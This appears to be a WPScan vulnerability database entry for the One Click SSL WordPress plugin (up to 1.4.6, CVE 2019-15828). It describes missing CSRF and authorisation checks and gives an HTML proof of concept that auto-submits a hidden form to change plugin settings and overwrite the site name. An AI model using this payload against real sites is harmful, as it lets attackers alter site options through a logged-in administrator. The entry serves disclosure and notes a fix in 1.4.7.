One Click SSL <= 1.4.6 - Multiple Issues



Description
Lack of CSRF and authorisation checks in the settings page, as well as AJAX methods such as ajax_enable_ssl(), ajax_scan() and so on could allow unauthorised settings change as well as call of the AJAX methods by a low privileged user.

Additionally, it could also allow arbitrary site options update due to the way the update_option() and update_site_option() are used in the admin() and admin_network() functions.
Proof of Concept
<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin.php?page=one-click-ssl" method="POST">
      <!-- Plugin's Settings -->
      <input type="hidden" name="ocssl_toolsmenu" value="1"/>
      <input type="hidden" name="ocssl_nonsslredirect" value="1"/>
      <!-- WP Options -->
      <input type="hidden" name="blogname value="Owned"/>
    </form>
  </body>
</html>

Affects Plugin

fixed in version 1.4.7

References

CVE 2019-15828
URL https://plugins.trac.wordpress.org/changeset/2121510

Classification

Type MULTI

Miscellaneous

Views 3188
Verified Yes
WPVDB ID 9448

Timeline

Publicly Published 2019-07-11 (4 months ago)
Added 2019-07-11 (4 months ago)
Last Updated 2019-08-30 (3 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin